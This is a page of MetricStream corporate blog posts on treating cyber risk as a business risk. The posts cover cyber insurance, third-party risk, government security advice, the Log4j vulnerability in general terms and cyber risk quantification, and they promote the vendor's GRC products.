Blogs
Is Your Organization Treating Cyber Risk as a Business Risk?
- IT Risk & Cyber Risk
- 27 July 22
4 min read
Introduction
You may think of cyber risk as a technology risk – but it’s also a top business risk! Consider these recent headlines:
- The BBC announced that the Swiss airspace was closed for hours and flights in and out of Switzerland were suspended because of a computer failure at air traffic control service Skyguide.
- The New York Times published a news story of how a cyberattack on a supplier to the auto giant Toyota stopped production in Japan.
- CBS News reported how a ransomware attack that prevented Lincoln College, Illinois, from accessing data used for student recruitment, retention, and fundraising efforts was one of the major reasons for the 157-year-old educational institution to shut down.
All of these news stories point to how the impact of cyber incidents today leads to serious business consequences. Cyber risk can no longer be viewed as merely an ‘IT problem’. Cyber incidents in the connected ecosystem can lead to financial losses, reputational damage, legal issues, regulatory fines, and even business closures. Leaders are well aware of this. As per the 2021 Gartner Board of Directors Survey, 88% of boards now view cybersecurity as a business risk—up by 30% since 2017.
Top Reasons Why Cyber Risk is Now a Business Risk
Multiple reasons have led to cyber risk being increasingly viewed as a business risk. Here are the most important that top the list:
- Software insecurities in critical infrastructure: To drive innovation and time-to-market demands, software has migrated from internally written code to a combination of software components including custom code, open-source software, third-party proprietary libraries, and external APIs. This has increased the scope of cyber risk. The recent Log4j vulnerability, discovered in December 2021, which resulted in 100 new hacking attempts every minute, is a prime example.
Chris Inglis, National Cyber Director, commented on the situation saying that the Log4j vulnerability "has highlighted the need to improve our software security and the transparency of our software supply chain." The vulnerability still has the potential to be exploited today and still requires vigilance.
Read the blog: The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient
- IT vendor risk: Headlined by the discovery of the SolarWinds attack in December 2020, supply chain attacks have steadily risen through 2021 and 2022. In Third-Party Risk: A Turbulent Outlook Survey Report 2022, the survey findings highlight an accelerated threat from IT vendors and third parties. 60% of respondents experienced an IT security incident in the past two years due to a third-party partner with access privileges.
More alarming to note was that the same number was also the most likely to have sensitive data stolen or suffered some type of business outage.
Download the report: Third-Party Risk: A Turbulent Outlook Survey Report 2022
- Cloud security gaps: With almost every organization having adopted cloud computing to some degree, the gaps in cloud security continue to increase cyber risk. The September 2021 OMIGOD vulnerability, remained a critical vulnerability until the patch was released. Organizations too are concerned.
Check Point’s 2022 Cloud Survey report found that 66% of organizations are concerned about cyber risk involving the exposure of sensitive data on the cloud, while 42% were concerned about legal and regulatory compliance with data protection regulations like PCI DSS and HIPAA.
An emerging way to address cloud security and compliance requirements is continuous control monitoring, or CCM. CCM automatically tests security controls and collects evidence of effectiveness, improving compliance and lessening reliance on outdated manual testing protocols.
Learn more about CCM: Improve Your Cyber Risk Posture and Compliance with Continuous Control Monitoring from MetricStream
- Increase in cyberattacks and ransomware: Cyberattacks continue to rise—both in number and in sophistication. Accenture's State of Cybersecurity Resilience 2021 study found that there were on average 270 attacks per company over the year, which was a 31% increase compared to the previous year.
Ransomware continues to be a constant threat affecting organizations across sectors. As per the State of Ransomware in the US study, an estimated 77 state and municipal governments and agencies, 1,043 schools, and 1,203 healthcare providers ended up as victims in 2021.
Read the eBook: Five Critical Capabilities for Effective Cyber Risk Management
Build Cyber Resilience with MetricStream CyberGRC
MetricStream’s CyberGRC, built as an interconnected, intuitive, and intelligent GRC product set, empowers your organization to connect cyber risk data from across the enterprise and leverage actionable business intelligence to make data-driven decisions to build cyber resilience.
MetricStream CyberGRC further enables your organization to effectively manage and mitigate cyber risk by:
- Quantifying of cyber risks in monetary terms to assess risks more accurately, communicate the risk more effectively, and make better-informed cyber investment decisions
- Leveraging intelligent issue and remediation to document, investigate, and resolve IT compliance and control issues in a systematic, automated manner
- Strengthening visibility into the overall compliance profile with intuitive dashboards and real-time reports
- Harmonizing controls across multiple IT regulations and frameworks, improving compliance and saving effort and costs
- Proactively managing and mitigating IT and cyber risks by continuously monitoring controls for effective cyber risk management
Want to learn more about how MetricStream CyberGRC can help build cyber resilience? Write to me at pmcparland@metricstream.com. You can also request a customized demo to see how our product works.
Jump to Topic
Related Resources
Blogs
Driving Effective Cyber Insurance and Investment Decisions with Cyber Risk Quantification
- IT Risk & Cyber Risk
- 06 July 22
4 min read
Introduction
Quick: How much car insurance will you need to pay next year?
You might not know the exact amount, but you can probably estimate based on a few factors:
- Your past driving record
- How long you’ve been driving
- The cost of your vehicle
- How much you plan to drive
- If you take liability as well as collision insurance
All of these inputs, or factors, create risk. Less experienced drivers are more likely to have accidents, and therefore pay more. If you have a record of speeding, you’ll be classified as riskier than someone who hasn’t.
Car insurance, home insurance and even credit insurance are familiar concepts and easy to grasp.
But what about cyber insurance? How do you estimate how much you need? Is it worth the cost? And does it replace cyber risk management?
Of course, cyber insurance is insurance, so it’s modeled on risk. And like car insurance, it focuses on covering the costs of a theft or an accident – or in the case of cyber, a data breach or incident. Cyber insurance typically covers the costs of notification, remediation, data recovery, and more, depending on the scope of the policy.
But cyber insurance isn’t a replacement for cyber risk management. It doesn’t cover pre-existing conditions – for example, if an organization knew of a cyber vulnerability and didn’t correct it, it won’t be covered. It doesn’t address costs arising from inadequate cyber security processes or employee error – a top source of data breaches.
Quantifying Cyber Risk for Cyber Insurance Decisions
What’s more, cybersecurity incidents and data breaches are increasing at an alarming rate across industries, particularly in the post-pandemic era. Considering just ransomware, there has been a 105% increase in ransomware attacks in 2021 as compared to 2020, according to SonicWall.
As the number of cybersecurity incidents continues to climb, cyber claims are also on the rise, driving up insurance premiums. According to Bloomberg, insurers have doubled the cost of annual premiums being charged to organizations in the past year. Today, organizations are paying more for the same level of protection or even lower.
Given the high-frequency, high-impact nature of cyber threats, how do you estimate how much coverage you need? And once you have coverage, how can you know when you are approaching your limits?
To find the answer to this question, organizations need to accurately understand their risk exposure and return on investment. Though of course insurers have their own application processes, it’s hugely helpful to understand and quantify cyber risks in monetary terms -- i.e., express the actual loss that an organization could face in financial values. This process helps decision-makers understand their cyber risk exposure, prioritize the risks, and make informed cybersecurity investment decisions. Understanding the dollar amount of risk will bring clarity to the board and executive management in answering questions such as:
- How much budget should be allocated to cybersecurity?
- What risks should be covered in cyber insurance?
- How much premium should be paid?
- Is the cybersecurity investment worth it?
- How much investment is good enough?
Expressing key risk metrics, such as value at risk, risk exposure, expected loss, and impact, in financial or monetary terms makes it easy to prioritize risks based on their potential financial impact – as well as estimate the need for insurance coverage.
These factors help drive an informed decision. Businesses can decide whether to pass the risk (by purchasing cyber insurance), forgo the risk (when the required investment is more than the financial impact of the risk), or take actions based on their risk appetite.
Leveraging risk quantification can enable organizations to optimize the utilization of resources by driving investments in the right technologies at the right time, based on the risk priorities.
Learn how MetricStream helped a U.S. Telco Giant Make Cybersecurity Decisions 60% Faster by Quantifying the Dollar Impact of Cyber Risks
Strengthening Cyber Resilience
All in all, cyber insurance is a valuable tool in the fight against cyber risk, but in no way replaces solid cyber risk planning. With businesses increasingly storing and managing data online and embracing automation, a lot is at stake. To manage the risks of today’s hyper-connected and digitized business environment and strengthen cyber resilience, organizations need to implement a comprehensive cyber risk management program, enriched with cyber risk quantification and continuous control monitoring capabilities.
To learn about MetricStream Advanced Cyber Risk Quantification, click here. To request a personalized demo, click here.
Jump to Topic
Related Resources
Blogs
Cyber and Third-Party Risk Management: Critical for Business Resilience
- IT Risk & Cyber Risk
- 16 March 22
5 min read
Introduction
A few months ago, I received a call from a person who introduced themselves as a call center executive from an online grocery store that I regularly shop with. They requested me to unblock my account by clicking on a link that they had sent me claiming that it was blocked by mistake. And as an apology, they promised to load INR 1000 in my online wallet. To sound even more convincing, they furnished several particulars such as details about my last orders, order numbers, etc. But soon I realized that my number was part of a contact list that had been purchased on the dark net and that I was being targeted by cyber criminals.
It is not just about customer data anymore. The complex web is spread so wide that the aftermath of such an act is unimaginable.
Today, it’s no longer ‘if you get attacked’ but ‘when you get attacked’. Zero trust is not just important but an absolute necessity for businesses to stay ahead of the next attack vector. More importantly, cyber resilience is no more just implementing tools and being assured of safety. Businesses need to continuously monitor these controls in the form of tools, people, and processes to check if they are functioning optimally or not.
I recently had the opportunity to participate in a lively and insightful discussion on this very topic: Business Resilience with Cyber and Third-Party Risk Management.
Some of the discussion points included:
- The expanding third-party risk landscape and the resulting challenges and threats
- The adoption of emerging technologies as key enablers in building cyber resilience
- The importance of businesses driving risk-aware business decisions
Watch the Webinar: Business Resilience with Cyber and Third-Party Risk Management
Here are the key highlights of our discussion.
Cybersecurity Risks from the Extended Enterprise are Bringing New Challenges
Along with the increased dependency on third parties and suppliers, due to the accelerated digitalization and the sudden shift to a remote working scenario, the risk of cyberattacks has also increased. More importantly, cyber risk, in today’s complex world, extends beyond third and fourth parties. The SolarWInds breach, where 18000 of the organization’s customers became vulnerable to hacks after installing the updates, is a clear example of the above.
Additionally, companies that are part of mergers and acquisitions also face or pose a great threat to a company’s cybersecurity. In a recent survey by the FBI, the data revealed that at least 3 publicly traded companies in the US were attacked by ransomware when they were in the middle of a merger and acquisition deal.
As a result, CIOs and CISOs are facing several challenges including:
- Strengthening data protection, especially with the nature of data sharing, it becomes imperative to strengthen the cybersecurity posture of the extended enterprise along with continuous monitoring of third-party and suppliers’ cybersecurity-related risks
- Ensuring vendor cybersecurity standards are being maintained, especially since 93% of CIOs and CSIOs are currently in the processes of digital transformation
- Bridging the IT skill gap, since there is currently an acute resource and skill shortage being faced by IT security teams
- Aligning culture with strategy, as an organization’s employees can become their weakest link if they are not properly trained to handle day-to-day threats like phishing attacks
- Preparing for emerging technologies and risks, especially as risks are becoming extremely interconnected in nature
Cyber Resilience Needs to be Built Leveraging the Right Tools and Technology
Fueled by the increase in digitalization, cyberattacks and data breaches, and remote working post-pandemic, building cyber resilience is now a top agenda for businesses around the globe. Organizations understand that just as risks are inevitable to businesses and strategies need to be formulated to manage and mitigate risks, so is the case with cyberattacks.
This has resulted in organizations investing in new tools and technologies that enable:
- Cyber risk quantification, which makes it possible to quantify cyber risk in monetary terms that helps in not just preparing for such scenarios but also in prioritizing and optimizing cyber investments
- Front line empowerment, which enables organizations to effectively implement zero-trust network security, as when it comes to cybersecurity, employees can either make or break a business, making proper training and easy-to-use reporting tools vital
- Anomaly identification with AI/ML technologies that can reduce human intervention, identify anomalies easily, and utilize human brains for deeper analysis
An Integrated Risk Management Approach is Vital to Driving Risk-Aware Decisions
The key objective of risk assessments is not just to determine your total risk exposure but to use it to drive strategic business decisions. However, most organizations look at risk assessments as a box that needs to be ticked and stop at periodic risk assessments. But if done right, risk and control assessments done using both qualitative and quantitative methods can provide a lot of meaningful insights. For this, you will need more than a software solution that manages a huge data set.
Your organization will need:
- Strong reporting and analytics capabilities to translate data sets into meaningful insights
- Processes and technologies to transfer the risk ownership to the front line
- Cyber risk quantification and advanced risk analytics such as scenario analysis, stress testing, and what-if analysis
Interested to learn more?
Watch the Webinar: Business Resilience with Cyber and Third-Party Risk Management
Thrive on Risk with MetricStream
At MetricStream, we empower organizations on their risk management journey--from managing risk to embracing risk to thriving on risk. MetricStream ConnectedGRC enables organizations to take an integrated approach to risk management. With a connected and collaborative approach, your organization is better able to identify, assess, manage, and mitigate strategic risks, operational and enterprise risks, IT and cyber risks, third-party risks, compliance risks, and environmental, social, and governance (ESG) risks.
You may also want to read:
Third-Party Risk: A Turbulent Outlook Survey Report 2022
The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient
Jump to Topic
Related Resources
Blogs
Boost Cyber Resilience – Here’s What Cybersecurity Agencies are Recommending
- IT Risk & Cyber Risk
- 10 March 22
4 min read
Introduction
In today’s digitized era, businesses exist not only in the physical world but also in the virtual world. Some companies exist only in the virtual world – all it takes is a website and a connection to get started. Today, we work from anywhere, across networks and devices. While this has significantly improved the ease of doing business, we are now exposed to cyber risk more than ever.
In this hyper-connected business environment with high digital dependencies among organizations, a cybersecurity incident at one organization can quickly obliterate connected businesses. What makes the situation direr is that data breach incidents often go undetected until it’s too late. According to the Cost of a Data Breach 2021 report, it takes 287 days on an average to identify and contain a data breach.
The need to strengthen cyber defense mechanism and safeguarding critical organizational assets cannot be overstated. So, what steps can your organization take right now to become more cyber resilient?
Useful Advice from U.S., U.K. and EU Governments
Governments and security agencies regularly issue regulations, frameworks, and guidance to help organizations amp up their cybersecurity measures. Here are some of the prominent regulatory bodies around the world and the advice they have to share.
Protect Against Ransomware with NIST
In the U.S., the National Institute of Standards and Technology (NIST) published a draft on “Cybersecurity Framework Profile for Ransomware Risk Management”, providing guidance to organizations to prevent, respond to, and recover from ransomware attacks.
More recently, the agency announced its plans to revise the framework to keep up with the ever-evolving cybersecurity landscape and published “Ransomware Risk Management: A Cybersecurity Framework Profile.”
“This Ransomware Profile can help organizations and individuals to manage the risk of ransomware events. That includes helping to gauge an organization’s level of readiness to counter ransomware threats and to deal with the potential consequences of events. The profile can also be used to identify opportunities for improving cybersecurity to help thwart ransomware,” the document reads.
For a deeper dive into NIST’s Cybersecurity Framework, click here.
Ongoing Advice from CISA and the FBI
Elevated cyber risk is a key concern to the U.S. government, and they regularly issue guidance and best practices. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) are all good sources to follow. Top recommendations to improve your cyber-resilience include:
- Require multi-factor authentication.
- Ensure that all software is up to date, especially those with known vulnerabilities.;
- Implement strong controls and policies
- Focus on identifying and quickly assessing any unexpected or unusual network behavior.
- Ensure antivirus/antimalware software is up to date.
- Designate a crisis-response team
- Assure availability of key personnel
- Conduct a tabletop exercise
- Test backup procedures
- Test controls
UK
In the UK, the National Cyber Security Centre (NCSC), a part of the Government Communications Headquarters (GCHQ), has also highlighted actions to take when the cyber threat is elevated, including:
- Check system patches to ensure they are up to date
- Verify access controls
- Ensure defenses like anti-virus software are working
- Log and monitor incidents
- Review backups
- Ensure that your incident management plan is current
- Check and perform a vulnerability scan of your internet footprint
EU
In the EU, the European Union Agency for Cybersecurity (ENISA) and CERT- EU have jointly issued a set of cybersecurity best practices for public and private organizations. This useful set of practices overlaps with the above and also includes some unique tips:
- Maintain tight control over third-party access to your internal networks and systems to prevent and detect potential attacks should a third party be compromised.
- Pay special attention to hardening your cloud environments.
- Review your data backup strategy and use the so-called 3-2-1 rule approach: keep three complete copies of data, with two of them locally stored but on different types of media, and at least one copy stored off-site.
- Conduct regular training to ensure that IT and system administrators have a solid understanding of security policy and associated procedures
- Block or severely limit internet access for servers or other devices that are seldom rebooted, as they can be used to establish back-door access
Now is the time to strengthen your organization’s cyber defense mechanism and protect against the looming cyber threats.
What Else Cybersecurity Teams Can Do to Build Resilience?
Encourage a security-aware mindset in their employees. Using strong passwords, multi-factor authentication, virtual private network (VPN), and other such measures go a long way in improving organizational security. Security teams must also back up critical data and information.
Closely monitor IT vendors and third parties. Third parties and vendors can serve as an entry point for a breach or attack. Security teams must identify IT vendors, classify them into “critical” and “non-critical” categories based on their access to organizational assets, perform due diligence, and raise red flags on an ongoing basis.
Implement strong policies, controls and gain visibility across your risks. Define and maintain business entities such as IT risks, assets, threats, vulnerabilities, processes, and controls in a central repository and regularly test and monitor controls for effectiveness
Explore how MetricStream can help – click here to request a personalized demo.
You may also be interested in:
Best Practices to Ensure Effective IT & Cyber Risk Management
Five Critical Capabilities for Effective Cyber Risk Management
For more advice, please contact us at info@metricstream.com.
Jump to Topic
Related Resources
Blogs
The Ripple of Effects of Log4J: How You Can Stay Prepared and Resilient
- IT Risk & Cyber Risk
- 08 February 22
5 min read
Introduction
Since the Log4j cyber vulnerability became public in early December 2021, there have been more than 100 new hacking attempts every minute.
- Hackers were able to take over a world-building game’s server before the patch was released.
- A government defense ministry was forced to shut down parts of its computer network.
- The U.S. Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) released mitigation guidelines for organizations, with its Director, Jen Easterly, calling the Log4j software vulnerability the most serious vulnerability she’s seen in her career.
So, what is Log4j and why is it being called one of the ‘worst attacks in history?’
How can it affect your organization, your cyber risk exposure, and how you assess your third parties and vendors?
What are the steps you can take to mitigate this urgent cybersecurity risk?
We bring you the answers to these critical questions.
A Vulnerability in a Widely Used Bit of Software
Log4j is an open-source software from the all-volunteer Apache Software Foundation. Freely available open-source software, like Log4j, is used by programmers as building blocks to do common tasks. Java programmers use Log4j to create a log of all activity on a device as the programs run. It is an extremely useful tool for programmers as it takes a string of code, copies it, in addition to examining the string and interpreting it.
However, as now exposed, Log4j has a vulnerability that allows the abuse of a feature —one that allows users to specify custom code for formatting a log message.
The consequence: third-party servers can submit software code that can perform a wide range of actions on the targeted computer, including stealing data, taking control of the system, and attacking with malware. This allows hackers to take control of web servers and launch remote attacks, giving them control of the computer services.
Widespread Impact Due to its Simplicity to Exploit
The fact that Log4j is a common piece of software appearing in millions of devices, combined with the simplicity to exploit, makes it a grave matter of concern. Log4j is widespread in cloud services, video games, industrial and hospital equipment, as well as software and security tools.
This makes potentially every device vulnerable to hacks, putting almost everyone at risk including governments, corporate systems, and individuals.
For enterprises, risk exposure to the Log4j vulnerability is even greater.
With the global increase of employees working from home due to the ongoing pandemic the risk of company data on personal devices being compromised unknowingly becomes greater. There is a very real risk of hackers exploiting the vulnerability to hack “shadow IT” appliances, those not centrally managed.
Key suppliers, vendors, third-party providers, and even fourth-party providers of enterprises who are part of the supply chain and provide critical support could also serve as a source for Log4j vulnerability exploitation.
Since Log4j is currently being used in many critical support infrastructures such as cloud platforms, web applications, and email services, a wide range of systems could be at risk from Log4j vulnerability. A provider of Internet hosting for software development and version control using Git has published a list of vulnerable applications and systems.
Moreover, most large organizations will also need to be aware of the risk from any of their own products that may have been built with enterprise Java software that legitimately used Log4j.
Next Steps: Addressing the Log4j Vulnerability
State-sponsored and cyber-criminal attackers have been exploiting the Log4j flaw throughout the month of December 2021 and continue to do so.
It is important to be aware that it is difficult to find Log4j within your organization’s software system because this open-source component is often “bundled” in the software. Companies may not even realize they are compromised.
Beyond implementing measures to stop any immediate risks, the long-term solution will always be to use scanning tools to assess your company’s risk and impact. Furthermore, an additional review of devices where there might be vulnerable installations will be needed.
How Can MetricStream Help?
MetricStream’s CyberGRC product can help you by:
- Providing a centralized repository for all your threats and vulnerabilities and streamline management on these issues by bridging silos within your company
- Assessing and managing your IT risks including impact assessment of IT vendor risk exposure
- Quantifying your cyber risk, especially when you locate the risk and even create various simulations to get a more accurate value of your risks
MetricStream’s ConnectedGRC provides a proactive approach to compliance and risk management giving you the power to rapidly scale and adapt your programs to emerging and evolving risks. Built as an interconnected, intuitive, and intelligent GRC program, our CyberGRC product line enables your organization to collate data from across the enterprise, including third and fourth-party vendors, which can then be transformed into actionable business intelligence to support data-driven decision-making.
This will help your organization gain:
- Real-time visibility in overall company risks and vulnerabilities with a 360-degree view of overall reporting and dashboards
- Improved efficiency by correlating vulnerabilities with IT assets, and prioritizing remediation efforts based on the highest levels of threats
- Increased assurance especially from your tech partners
Want to learn more? Write to me at jbhowmick@metricstream.com to discuss how to mitigate your risk from the Log4j vulnerability.
Check out more resources related to cybersecurity:
The Ultimate Guide to Cyber Security and IT & Cyber Risk
Jump to Topic
Related Resources
Blogs
Cyber Risk Quantification: Core Metrics for Success
- IT Risk & Cyber Risk
- 04 February 22
7 min read
Introduction
At the recently held MetricStream GRC Summit, October 2021, Gavin Grounds - Executive Director, GRC, Verizon, and Prasad Sabbineni - CTO, MetricStream, sat down for a fireside chat to discuss the implementation of quantification in risk management and how it can help CISOs and cyber security teams.
Gavin Grounds is the Executive Director for Governance, Risk, and Compliance at Verizon and has worked on risk management and cyber security [at Verizon] for over three years. He has previously worked at HP, DXC Technology, and other large organizations managing cyber security and compliance. He is also a chapter President of ISACA. As a cyber security risk professional, he has pioneered several leading concepts in cyber risk and risk quantification.
Prasad Sabbineni is Chief Technology Officer at MetricStream. He has previously worked at Citigroup and other leading banking organizations and has over 25 years of experience in risk management, compliance, and information security.
Read the abbreviated transcript to learn more about the meaning of cyber risk quantification, the need for cyber risk quantification, the current state of cyber security metrics, and how quantification will benefit Risk Officers, CISOs and security teams.
The Current State of Risk Measurement
Prasad Sabbineni: Gavin, if we can start as to why it is so critical to quantify cyber risk?
Gavin Grounds: I think presently, most cyber security teams still use varying approaches based on gradients and colours, such as low, medium, high and critical or red, amber, and green to measure. However, these indicators are vague owing to the vastly complex world of cyber risk and don’t effectively support the business. In almost all other areas of business, we use actual numbers to express the level of risk associated with a specific business aspect. In general, the cyber security community is still lagging in this regard.
Prasad Sabbineni: The use of such vague indicators makes it difficult to identify the actual severity of an event. The fact that it is difficult to assess how high is ‘high’ or how red is ‘red’ renders these tools futile.
Gavin Grounds: To better manage risk, companies must make quantification of risk a prerequisite in developing and executing cyber security strategies. It is essential to assign figures and statistics to threats and to calculate risk in terms of numbers. The use of indicators such as gradients, levels, or categories does not do justice to the process of cyber risk management.
The Need for Risk Quantification
Prasad Sabbineni: Why do risk managers need to quantify risks?
Gavin Grounds: While a cyber security framework is generally used to define the action plan of a security team, the role of risk management is to define why a particular plan exists in the first place – what does – or maybe even what does not – need to be done. Therefore, risk management justifies the need for a specific cyber defence strategy.
Prasad Sabbineni: Over the last 30 years, risk has evolved in several industries and in different ways. Market risk, compliance risk, and operational risk have all taken a new shape, resulting in a natural progression towards quantification.
Understanding Quantification
Gavin Grounds: When people talk about cyber risk quantification, many automatically start trying to calculate annualized loss expectancy (ALE). However, even though this method would work for other sectors, it remains an incomplete approach for managing cyber risk. ALE only looks at one aspect, i.e., what a potential loss might be; risk management requires a more holistic approach. Simply put, risk management is more about optimizing risk than reducing risk. The essence of business lies in taking a risk; the key is to understand which risks to take and how much risk to take.
The most significant drawback of only looking at ALE is witnessed when an enterprise needs to enable broader business opportunities, where it becomes imperative to increase the risk profile. The ALE approach is native to the insurance industry, which deals with a finite number of perils, where a limited number of scenarios result in those perils materializing. These are actually the statistics used by actuaries to calculate the premium they need to collect for the coverage provided.
For cyber security, however, there exists an infinite, or at least an ever-increasing number of perils that can be a result of an infinite number of scenarios. Owing to such vast possibilities, most CISOs and risk managers in the cyber security domain often tend to focus their efforts on identifying and managing the top 10 or 15 (or any other convenient figure) scenarios. However, the more significant risk associated with this approach is that the top risk might just be the 11th or the 16th one, i.e., the one that was ignored or not given due attention.
A Paradigm Shift in the Way Companies View Risk
Gavin Grounds: Risk must be treated as a different currency in itself. This can be done by assigning an empirical numeric value to an asset based on its business value, or its mission criticality (perhaps the crown jewel), along with the degree of exposure or susceptibility, or vulnerability. Quantification is when the risk is assigned such a numeric value. When there is a points-based system, risk currency can be mapped to the fiscal opportunity or fiscal loss probabilities, much like forex rates, to get a clear understanding of what we stand to lose and gain when a particular risk is taken or not taken.
Prasad Sabbineni: How can companies transform cyber risk management strategies through quantification?
Gavin Grounds: The universe of cyber security is so massive and complex and that is actually why quantification becomes so necessary. My advice is to Start with what you do have, Improve based on what you could have, and always Aspire to what you should have.
There is no single answer for everyone as to where one can begin quantifying. Except for that, the only place that you can start from is where you are. So, start there – start the quantification journey based on what you do know. The only way forward is to take action and make the best out of the current circumstances. Begin with the information already present with the organization, such as which business processes hold the highest value for an enterprise and which platforms and applications support these high-value processes. Next, these platforms and applications can be quantified in terms of the intrinsic value that they hold. We can also take all of the system and user activity log information and incorporate that into our calculation of an intrinsic numeric score (points) for risk quantification. An ideal way is to start small and protect the crown jewels, those systems that support the processes and assets with the highest business value and mission criticality, by quantifying associated risks before launching an all-out cyber risk quantification campaign.
In establishing this risk currency-based approach, using empirical numeric scoring, it allows us to then stack rank assets in terms of their value and potential exposure, so as to help then prioritize investment decisions, remediation activities, and the like. This approach to quantification also provides us with deeper insights into the overall operating risk of the environment, in near-real-time, that we don’t otherwise get from a model that is exclusively scenario-based focused on ALE.
You asked earlier about how risk quantification can help in major events, such as we have seen with the COVID-19 pandemic. I think the pandemic response has allowed many companies to assess their current exposure. For those companies, it has served to at least pressure-test existing risk management and control frameworks and has provided a good line of sight and opportunity to test methodologies for managing risk. For many, it has also potentially improved the depth and accuracy of information for managing the environment. Such opportunities must be leveraged to continuously pressure-test and improve existing systems and develop, or enhance metrics, for managing cyber risk.
Cyber Risk Quantification and Third-Party Risk
Prasad Sabbineni: Does quantification change the way companies manage risk associated with third parties? Any final thoughts and advice for CISOs?
Gavin Grounds: When the risk is quantified, third-party risk management changes completely. We need to have the same rigor and the same degree of telemetry over our third-party product and service providers, as we do over our internal IT or delivery partners. The issue that many companies face with respects to third-parties is the techniques and the level of detail, or line-of-sight that can be established for a third-party are different than for an internal function or solution. Nonetheless, the need for quantification of risk doesn’t go away. In fact, it becomes even more important. We still can – and should – use an empirical numeric quantification methodology. Asking the right questions and seeking relevant information from third parties allows companies to identify those quantifiable indicators. This, in turn, enables a clearer assessment of third-party exposure while also bridging gaps in communication between different delivery entities.
CISOs have a lot on their plate, including cyber protection, changes in the threat landscape, regulatory compliance, meeting corporate or contractual obligations and oftentimes, everything is a priority. Having a solid, quantification-based risk management methodology can make all the difference in the world to a CISO. Risk management answers the “why?” of a cyber defence strategy, answering why specific steps are taken. Quantification helps CISOs answer the question “so what?” or “why does that matter?” When we have answered that question multiple times, we have essentially landed on a risk statement and quantification makes it easier for CISOs and security teams to prioritize what is needed to protect the business from perils, while simultaneously prioritizing based on their currency value.
Prasad Sabbineni: To summarize, even a simple line of questioning can come a long way in prioritizing risks and resources to manage the risks—making it all the more important for CISOs to start quantifying cyber risks.
Get the Full Transcript: Cyber Risk Quantification: Core Metrics for Success
Watch the Video
Jump to Topic
Related Resources
Blogs
Making Third-Party Risk Foolproof. Is Your Organization Ready to Assess, Manage, and Remediate Third Party and Cyber Risk?
- IT Risk & Cyber Risk
- 28 January 22
6 min read
Key Findings from Third-Party Risk: A Turbulent Outlook Survey Report 2022
“How can we make cybersecurity foolproof?” is a question I have been asked. My answer is always the same. When it comes to cybersecurity, thinking one can achieve a foolproof status is proof of being a fool. Cybersecurity can never reach a perfect state but is a continuous journey. The question asked should then be on how one should prioritize the journey.
This journey now includes third parties as well. Over the past few years, more so with the recent pandemic, organizations are increasingly relying on third parties, including vendors and suppliers, to meet business goals and gain the much-needed competitive advantage. But as organizations choose outsourced services and software to make up for talent and supply shortages, they are also increasingly seeking effective ways to mitigate the elevated risk that third-party relationships bring.
To understand how organizations are prioritizing and managing third-party risk, MetricStream sponsored a study with thinktank CyberRisk Alliance to survey top IT and cybersecurity decision-makers and influencers from across industries and understand how well organizations managed and mitigated risks associated with third-party partnerships.
We learned a lot – mostly that third parties remain a highly critical and sensitive risk factor for cyber risk incidents like data breaches and more.
Who was surveyed?
301 IT and cybersecurity decision-makers and influencers from the United States and Canada (1%) were surveyed online in late fall 2021. CISOs (35%), IT security directors or managers (49%) and administrators, analysts and consultants (16%) across diverse industries including business or professional services, manufacturing, retail or ecommerce, high-tech/IT, and financial services and insurance, healthcare, government, non-profits, and energy & utilities were part of the survey. 64% worked at companies with less than 1,000 employees, while the remaining 36% worked at organizations with a larger workforce.
Participants were asked about their vendor relations, concerns, and challenges in managing risks, and the actions they are taking to combat third-party cyber risk.
Here are a few key highlights from the Third-Party Risk: A Turbulent Outlook Survey Report 2022:
The threat from partnerships has expediated, with 60% of cyber attacks coming from third parties
The past two years stand witness to a drastic increase in supply chain attacks, with many of the outcomes being well-publicized, such as the SolarWinds. The report survey findings highlight an accelerated threat from IT vendors and third parties:
- 60% of respondents experienced an IT security incident in the past two years due to a third-party partner with access privileges
- The same number was also the most likely to have sensitive data stolen or suffered some type of business outage
- When it came to damages, some paid as much as $1 million or more with 45% incurring at least $100,000
Third-party risk mitigation and management have become a priority
Several factors including the sudden onset of the pandemic, large numbers of employees working from home, and the more recent trend where an increasing number of employees are quitting their jobs in what is being termed as “The Great Resignation” has resulted in organizations becoming dependent on IT vendors and third parties.
IT leaders recognize the elevated risk from outsourcing elements of IT functionality.
- 76% of respondents stated that managing third-party risk was a high or critical priority
- 70% ranked cyber as the No. 1 or No. 2 risk among their third-party/supply chain partners
The result of this heightened risk awareness is that most IT and cybersecurity teams have increased their budgets as well. Nearly half—49%--of all organizations have increased budget spending to improve third-party risk management programs.
Effective cyber third-party risk management remains a challenge
Although most IT and cybersecurity leaders are aware of the elevated risk from third-party partnerships, they are faced with multiple challenges when it comes to ensuring effective cyber vendor risk management.
Common challenges cited by survey respondents include:
- Lack of qualified staff to implement a third-party management solution
- Difficulty in prioritizing, assessing, and managing a large number of partners
- Lack of resilience against attacks or malware from trusted third parties
An acute lack of visibility into supply chains and associated risk was also named as a major challenge, with 72% of respondents believing that supply chain visibility including tracking components, sub-assemblies, and final products was very or critically important. Added to this was also the lack of communication or coordination between IT security, governance, leadership, and procurement teams.
IT and cybersecurity teams also faced challenges around evaluating who would do the risk evaluation.
Currently, more than half (54%) relied on their third-party partners’ assessments, while the remaining 43% hired an outside service.
Get the Full Report: Third-Party Risk: A Turbulent Outlook Survey Report 2022
Register for the Webinar on 22 Feb 2022: What’s Next in CyberRisk? Third-Party Risk: A Turbulent Outlook
Tune in to listen to a team of experts who will review the key findings of the Cyber Risk Alliance Report, “Third Party Risk Lurking in the Shadows" as well as discuss practical recommendations for actively managing cyber risk.
Power What’s Next by Leveraging CyberGRC SaaS Solutions
Effective management and mitigation of third-party cyber risks requires regular updating of policies and re-examination of procedures, replacement of obsolete tools, periodical review of partnerships, and developing and/or adopting of new frameworks.
Organizations will also need adequate visibility into vendor and third-party activity, seamless collaboration between various teams, and a quick remediation plan in place in the event of a security incident. Digital tools built to assess and mitigate third and fourth-party risk are the way forward for organizations seeking to manage vendor and third-party risks in a streamlined and consistent manner.
MetricStream’s CyberGRC can effectively keep third-party risks in check with the IT Vendor Risk and Third-Party Risk Management solution which provides integrated, real-time visibility into the vendor ecosystem and empowers organizations to gain an in-depth view of risks of both third and fourth-party vendors. Additionally, with the automation of vendor information management, vendor onboarding, continuous monitoring, vendor risk, compliance and control assessments, and risk mitigation, organizations gain a single and simple tool to manage their IT vendor and third-party risks.
